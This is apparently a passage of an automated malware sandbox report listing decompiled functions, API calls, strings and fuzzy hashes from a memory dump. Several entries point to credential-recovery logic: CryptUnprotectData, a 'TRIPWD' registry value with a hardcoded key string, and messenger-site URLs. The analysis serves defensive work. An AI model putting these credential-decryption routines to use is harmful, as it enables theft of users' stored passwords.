Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

memcpy.MSVCRT ref: 0040FDD4
LocalFree.KERNEL32(?,?,00000000,?,?,7614F420,00000000), ref: 0040FDE6
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,7614F420,00000000), ref: 0040FE2F

Strings

, xrefs: 0040FD76

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
String ID:
API String ID: 2372935584-3916222277
Opcode ID: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
Instruction ID: 0b8e4f374d5667c45180376da1c8b12cffb8e3ff2062487e5a08cff45f7818d2
Opcode Fuzzy Hash: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
Instruction Fuzzy Hash: 6B414CB2900209ABCF21DF95D940ADEBBF8AF48304F10407BE915B7291D774AA44CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408D47, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00408D47(struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t25;
				char* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				int _t43;
				signed int _t45;
				signed int _t46;

				_t46 = _t45 & 0xfffffff8;
				0x414060();
				_t25 = GetMenuItemCount(_a8);
				_t43 = 0;
				_v0 = _t25;
				if(_t25 <= 0) {
					L13:
					return _t25;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t46 = _t46 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t25 = GetMenuItemInfoA(_a8, _t43, 1,  &_a4);
					if(_t25 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t25 = E00408D47();
							_t46 = _t46 + 0xc;
						}
						goto L12;
					}
					_t31 = strchr( &_a52, 9);
					if(_t31 != 0) {
						 *_t31 = 0;
					}
					_t32 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x41e1fc =  *0x41e1fc + 1;
							_t33 =  *0x41e1fc; // 0x0
							_t32 = _t33 + 0x11558;
						} else {
							_t18 = _t43 + 0x11171; // 0x11171
							_t32 = _t18;
						}
					}
					_t25 = E00408D0F(_t32,  &_a52);
					goto L10;
					L12:
					_t43 = _t43 + 1;
				} while (_t43 < _v0);
				goto L13;
			}

0x00408d4a
0x00408d52
0x00408d5c
0x00408d64
0x00408d68
0x00408d6c
0x00408e31
0x00408e36
0x00000000
0x00000000
0x00000000
0x00408d72
0x00408d72
0x00408d7d
0x00408d82
0x00408d89
0x00408d98
0x00408da0
0x00408da8
0x00408db0
0x00408db4
0x00408db8
0x00408dc0
0x00000000
0x00000000
0x00408dc6
0x00408e10
0x00408e14
0x00408e16
0x00408e17
0x00408e1b
0x00408e1e
0x00408e23
0x00408e23
0x00000000
0x00408e14
0x00408dcf
0x00408dd8
0x00408dda
0x00408dda
0x00408de0
0x00408de4
0x00408de9
0x00408df3
0x00408df9
0x00408dfe
0x00408deb
0x00408deb
0x00408deb
0x00408deb
0x00408de9
0x00408e09
0x00000000
0x00408e26
0x00408e26
0x00408e27
0x00000000

APIs

GetMenuItemCount.USER32(?), ref: 00408D5C
memset.MSVCRT ref: 00408D7D
GetMenuItemInfoA.USER32 ref: 00408DB8
strchr.MSVCRT ref: 00408DCF

Strings

6, xrefs: 00408DA0
0, xrefs: 00408D98

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetstrchr
String ID: 0$6
API String ID: 2300387033-3849865405
Opcode ID: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
Instruction ID: e6c6313dcb9b7a471bbfbaa7ec765517bc0a4c64eff5ea5afbcc667e6a019d72
Opcode Fuzzy Hash: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
Instruction Fuzzy Hash: DD21BF71408384AFD7118F11D881A9BB7E8FF85348F044A3FF584A62D0EB39D944CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00407034, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 59
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00407034(char* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v1035;
				void _v1036;
				int _t28;
				int _t34;
				char* _t39;
				int _t42;
				void* _t43;
				void** _t45;
				void* _t46;
				void* _t47;

				_t42 = 0;
				_v1036 = 0;
				memset( &_v1035, 0, 0x3ff);
				_t47 = _t46 + 0xc;
				 *__ebx = 0;
				_t45 = _a4 + 4;
				_v12 = 8;
				do {
					_push( *_t45);
					_push( *((intOrPtr*)(_t45 - 4)));
					sprintf( &_v1036, "%s (%s)");
					_t28 = strlen( &_v1036);
					_v8 = _t28;
					memcpy(_t42 + __ebx,  &_v1036, _t28 + 1);
					_t43 = _t42 + _v8 + 1;
					_t34 = strlen( *_t45);
					_v8 = _t34;
					memcpy(_t43 + __ebx,  *_t45, _t34 + 1);
					_t47 = _t47 + 0x30;
					_t45 =  &(_t45[2]);
					_t17 =  &_v12;
					 *_t17 = _v12 - 1;
					_t42 = _t43 + _v8 + 1;
				} while ( *_t17 != 0);
				_t39 = _t42 + __ebx;
				 *_t39 = 0;
				 *((char*)(_t39 + 1)) = 0;
				return __ebx;
			}

0x00407044
0x0040704e
0x00407055
0x0040705d
0x00407060
0x00407063
0x00407066
0x0040706d
0x0040706d
0x00407075
0x0040707e
0x0040708a
0x0040708f
0x0040709f
0x004070a9
0x004070ad
0x004070b2
0x004070bd
0x004070c5
0x004070c8
0x004070cb
0x004070cb
0x004070ce
0x004070ce
0x004070d4
0x004070d8
0x004070db
0x004070e3

APIs

memset.MSVCRT ref: 00407055
sprintf.MSVCRT ref: 0040707E
strlen.MSVCRT ref: 0040708A
memcpy.MSVCRT ref: 0040709F
strlen.MSVCRT ref: 004070AD
memcpy.MSVCRT ref: 004070BD

Strings

%s (%s), xrefs: 00407078

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpystrlen$memsetsprintf
String ID: %s (%s)
API String ID: 3756086014-1363028141
Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406DCD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406DEC
sprintf.MSVCRT ref: 00406E0D
_mbscat.MSVCRT ref: 00406E1F
_mbscat.MSVCRT ref: 00406E3C
_mbscat.MSVCRT ref: 00406E4B

Strings

%2.2X, xrefs: 00406E07

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscat$memsetsprintf
String ID: %2.2X
API String ID: 125969286-791839006
Opcode ID: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
Instruction ID: 5142681b0c0ad1f2d34765b6081944bd4f79e84a169991ad97d052608da76018
Opcode Fuzzy Hash: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
Instruction Fuzzy Hash: 82012872A0431466D7225A26DC43BEB77AC9B44B05F10007FFC45B51C1FABC96C447D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040496D, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

_mbscat.MSVCRT ref: 004049BE
_mbscpy.MSVCRT ref: 004049CC
_mbscpy.MSVCRT ref: 004049DA

Strings

msvcrt.dll, xrefs: 004049D1
memcpy, xrefs: 004049C6
eK@, xrefs: 0040497B, 00404985

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$_mbscat
String ID: eK@$memcpy$msvcrt.dll
API String ID: 2404237207-527332992
Opcode ID: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
Instruction ID: ade7c94f42c2b1d8f6f4d02d55b8563967db19c46ba0ec0bd93feed85f1333d3
Opcode Fuzzy Hash: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
Instruction Fuzzy Hash: 7701001144DBC089E372D7289549B97AEE51B22608F48098DD1C647A83D2AAB65CC3BA

Uniqueness

Uniqueness Score: -1.00%

Function 00408B7A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00408B7A(struct HWND__* _a4) {
				void _v4103;
				char _v4104;

				0x414060();
				if( *0x41e200 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					_push( *0x41e348);
					sprintf(0x41e308, "dialog_%d");
					if(E00408C31(?str?,  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00408B1D, 0);
				}
				return 0x1004;
			}

0x00408b82
0x00408b8e
0x00408b9e
0x00408ba5
0x00408baa
0x00408bba
0x00408bd5
0x00408be1
0x00408be1
0x00000000
0x00408bf1
0x00408bf8

APIs

memset.MSVCRT ref: 00408BA5
sprintf.MSVCRT ref: 00408BBA

Part of subcall function 00408C31: memset.MSVCRT ref: 00408C55
Part of subcall function 00408C31: GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
Part of subcall function 00408C31: _mbscpy.MSVCRT ref: 00408C91

SetWindowTextA.USER32(?,?), ref: 00408BE1
EnumChildWindows.USER32(?,Function_00008B1D,00000000), ref: 00408BF1

Strings

caption, xrefs: 00408BC6
dialog_%d, xrefs: 00408BB0

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
String ID: caption$dialog_%d
API String ID: 2923679083-4161923789
Opcode ID: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
Instruction ID: de831da21bc0203e5008b33b3115c9aeec9d60fef0dfeaee9ccd5ecb51ae2e74
Opcode Fuzzy Hash: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
Instruction Fuzzy Hash: EEF0C27054034CBAEB129751DC06FD93A686B08B05F0440AABB84B11D1DEB896C08B1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040807D, Relevance: 9.1, APIs: 6, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040807D(char* __ebx, void* __eflags, void _a4, void _a8, intOrPtr _a12, short _a16) {
				void _v8;
				void _v12;
				char _v28;
				char _v116;
				char _v244;
				char _v248;
				char _v372;
				void _v627;
				char _v628;
				void* __edi;
				void* __esi;
				void* _t44;
				intOrPtr* _t50;
				int _t57;
				char* _t66;
				signed int _t69;
				intOrPtr _t75;
				int _t76;
				void* _t82;
				void* _t83;

				_t66 = __ebx;
				_t76 = 0;
				memcpy( &_v12,  &_a8, 4);
				memcpy( &_v8,  &_a4, 4);
				E0040C905( &_v116);
				_push( &_v12);
				_t44 = 8;
				E0040C929(_t44,  &_v116);
				E0040C9C7(0,  &_v116,  &_v28);
				E00405235( &_v372);
				_t69 = 0;
				_t50 =  &_v248;
				do {
					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xf0)) =  *((intOrPtr*)(_t50 - 4));
					_t75 =  *_t50;
					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xec)) = _t75;
					_t69 = _t69 + 2;
					_t50 = _t50 - 8;
				} while (_t69 < 0x20);
				if(_a16 >= 8) {
					_v628 = 0;
					memset( &_v627, 0, 0xfe);
					_t81 = _a12;
					E00405641(_a12, _t69, __ebx,  &_v244);
					if(_a16 < 0x10) {
						__ebx[8] = 0;
					} else {
						E00405641(_t81 + 8,  &_v244,  &(__ebx[8]),  &_v244);
						__ebx[0x10] = 0;
					}
					_t57 = strlen(_t66);
					if(_t57 > 2) {
						asm("cdq");
						_t82 = (_t57 - _t75 >> 1) - 1 + _t66;
						0x413d0c( &_v628, _t82 + 2);
						0x413d0c(_t82,  &_v628);
					}
					_t76 = 1;
				}
				return _t76;
			}

0x0040807d
0x00408092
0x00408094
0x004080a3
0x004080ab
0x004080b3
0x004080b6
0x004080ba
0x004080c6
0x004080d7
0x004080dc
0x004080de
0x004080e4
0x004080e7
0x004080ee
0x004080f0
0x004080f8
0x004080f9
0x004080fc
0x00408106
0x00408119
0x00408120
0x00408125
0x00408133
0x00408140
0x0040815b
0x00408142
0x0040814f
0x00408155
0x00408155
0x00408160
0x00408169
0x0040816b
0x00408171
0x0040817f
0x0040818c
0x00408191
0x00408196
0x00408196
0x0040819c

APIs

memcpy.MSVCRT ref: 00408094
memcpy.MSVCRT ref: 004080A3

Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA

Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D

memset.MSVCRT ref: 00408120
strlen.MSVCRT ref: 00408160
_mbscpy.MSVCRT ref: 0040817F
_mbscpy.MSVCRT ref: 0040818C

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpymemset$_mbscpy$strlen
String ID:
API String ID: 2712745786-0
Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8FA, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B8FA(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				void* _t39;
				signed short _t52;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_v72 = E0040876F(0x1f5);
				_v68 = 0x418600;
				_v64 = E0040876F(0x1f6);
				_v60 = 0x418600;
				_v56 = E0040876F(0x1f7);
				_v52 = 0x418600;
				_v48 = E0040876F(0x1f8);
				_v44 = 0x418608;
				_v40 = E0040876F(0x1f9);
				_v36 = 0x418608;
				_v32 = E0040876F(0x1fa);
				_v28 = 0x418618;
				_v24 = E0040876F(0x1fb);
				_v20 = 0x418620;
				_v16 = E0040876F(0x1fc);
				_v12 = 0x418620;
				E00407034( &_v1096,  &_v72);
				_t52 = 7;
				_t39 = E0040876F(_t52);
				_t23 =  &_v8; // 0x747874
				return E00406E60(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}

0x0040b913
0x0040b91a
0x0040b927
0x0040b939
0x0040b93c
0x0040b949
0x0040b94c
0x0040b955
0x0040b958
0x0040b96a
0x0040b96d
0x0040b976
0x0040b979
0x0040b986
0x0040b989
0x0040b99b
0x0040b99e
0x0040b9a6
0x0040b9b3
0x0040b9b6
0x0040b9be
0x0040b9bf
0x0040b9c7
0x0040b9e7

APIs

memset.MSVCRT ref: 0040B91A

Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877

Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808

Part of subcall function 00407034: memset.MSVCRT ref: 00407055
Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
Part of subcall function 00407034: memcpy.MSVCRT ref: 0040709F
Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
Part of subcall function 00407034: memcpy.MSVCRT ref: 004070BD

Part of subcall function 00406E60: _mbscpy.MSVCRT ref: 00406EC6

Strings

*.csv, xrefs: 0040B995
*.htm;*.html, xrefs: 0040B960
*.txt, xrefs: 0040B933
*.xml, xrefs: 0040B989
txt, xrefs: 0040B9C7, 0040B9CA

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
API String ID: 2726666094-3614832568
Opcode ID: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
Instruction ID: 663635aaa2767a47ae833ce325b1c2bbb94a135e02c7cec880bc1d98f4d47d81
Opcode Fuzzy Hash: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
Instruction Fuzzy Hash: 8E21EBB5C002189FCB01FFA5DA817DDBBB4AB08708F20417FE549B7286DF381A558B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406CAA, Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406CAA(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}

0x00406caa
0x00406cc1
0x00406cc6
0x00406cd2
0x00406cd5
0x00406ce2
0x00406cfa
0x00406d0e
0x00406d2a

APIs

GetDC.USER32(00000000), ref: 00406CB5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00406CC6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00406CCD
ReleaseDC.USER32(00000000,00000000), ref: 00406CD5
GetWindowRect.USER32(?,?), ref: 00406CE2
MoveWindow.USER32(?,?,?,?,?,00000001,?,770B3BB0), ref: 00406D20

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CapsDeviceWindow$MoveRectRelease
String ID:
API String ID: 3197862061-0
Opcode ID: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
Instruction ID: 8a34af0b3d0659c25a6c3d8e0783375a2f2358695c0a050eea5ba45bf34a7176
Opcode Fuzzy Hash: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
Instruction Fuzzy Hash: 62118E32A00219EFDB009FB9CD4DEEF7FB8EB84750F054165F905A7250DA70AD01CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00403D24, Relevance: 9.1, APIs: 6, Instructions: 56
filestringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00403D24(void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				0x414060();
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x00403d2c
0x00403d42
0x00403d49
0x00403d5c
0x00403d62
0x00403d79
0x00403d98
0x00403dc4

APIs

memset.MSVCRT ref: 00403D49
memset.MSVCRT ref: 00403D62
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403D79
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403D98
strlen.MSVCRT ref: 00403DAA
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403DBB

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWidememset$FileWritestrlen
String ID:
API String ID: 1786725549-0
Opcode ID: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
Instruction ID: 833f6c37e82b16f9b4c34b80bb2ce5ff812abd73926e68a98c8801a8732a43de
Opcode Fuzzy Hash: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
Instruction Fuzzy Hash: 2C111BB644122CFEEB119B94DC89EEB77ACEF08354F1041A6B715E2091E6349F448BB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F37A, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972

_strcmpi.MSVCRT ref: 0040F3D1
_strcmpi.MSVCRT ref: 0040F3F0

Strings

http://www.ebuddy.com, xrefs: 0040F3CB
https://www.google.com, xrefs: 0040F408
http://www.imvu.com, xrefs: 0040F3EA

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi$memcpystrlen
String ID: http://www.ebuddy.com$http://www.imvu.com$https://www.google.com
API String ID: 2025310588-2353251349
Opcode ID: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
Instruction ID: 147ef2bbec41d1b0b79b570ae49dc02a3b2ea9406cbc79ec07c01e0a249b4c29
Opcode Fuzzy Hash: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
Instruction Fuzzy Hash: 1B11C1B21083409AD330EF25D8457DB77E8EFA4305F10893FE998A2182EB785649875A

Uniqueness

Uniqueness Score: -1.00%

Function 00412E4D, Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 00412E5B
??3@YAXPAX@Z.MSVCRT ref: 00412E76
??3@YAXPAX@Z.MSVCRT ref: 00412E8C
??3@YAXPAX@Z.MSVCRT ref: 00412EA2
??3@YAXPAX@Z.MSVCRT ref: 00412EB8
??3@YAXPAX@Z.MSVCRT ref: 00412ECE

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
Instruction ID: 39cb4549293e6cd4e8f45f1fb6a35693fcb7bd1e2582dcc07fe9920ce8c868a3
Opcode Fuzzy Hash: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
Instruction Fuzzy Hash: 83014F32A0AA3527C6257E2675017CBA3646F05B29F15420FF808B73428B6C7DE046DE

Uniqueness

Uniqueness Score: -1.00%

Function 00413B1D, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413B3E
memset.MSVCRT ref: 00413B57
memset.MSVCRT ref: 00413B6B

Part of subcall function 00413646: strlen.MSVCRT ref: 00413653

strlen.MSVCRT ref: 00413B87
memcpy.MSVCRT ref: 00413BAC
memcpy.MSVCRT ref: 00413BC2

Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA

Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D

memcpy.MSVCRT ref: 00413C02

Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996

Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpymemset$strlen
String ID:
API String ID: 2142929671-0
Opcode ID: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
Instruction ID: 3b0ef80f5f4f1d26b85f6ed19fc7f93af9089081b0544b1b4270697ce1475561
Opcode Fuzzy Hash: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
Instruction Fuzzy Hash: EB512CB290011DAFCB10EF55DC81AEEB7A9BF04309F5445BAE509E7141EB34AF898F94

Uniqueness

Uniqueness Score: -1.00%

Function 00402730, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B

strtoul.MSVCRT ref: 00402782
_mbscpy.MSVCRT ref: 00402807
_mbscpy.MSVCRT ref: 00402817

Strings

3 d5JKNNC,MANSLDJQ32ELK1N4SAIp08, xrefs: 00402797
TRIPWD, xrefs: 0040273F

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$QueryValuestrtoul
String ID: 3 d5JKNNC,MANSLDJQ32ELK1N4SAIp08$TRIPWD
API String ID: 4008679483-1446091703
Opcode ID: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
Instruction ID: 4ca16360b260b82c0f814568f8b1846068da3ba20428fc10580ffdfcf904f702
Opcode Fuzzy Hash: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
Instruction Fuzzy Hash: 2C31E83280424C6EDF01DBB8E941ADFBFB4AF19310F1444AAE944FB191D674AB49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2F5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040B2F5(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t30;
				void* _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr* _t41;
				char* _t51;
				int _t58;
				intOrPtr _t69;

				_t40 = __eax;
				memcpy( *((intOrPtr*)(__eax + 0x390)) + 0x1d4,  *(__eax + 0x38c), 0x1c8 << 2);
				asm("movsw");
				asm("movsb");
				_t44 =  *((intOrPtr*)(_t40 + 0x398));
				_t58 = 0;
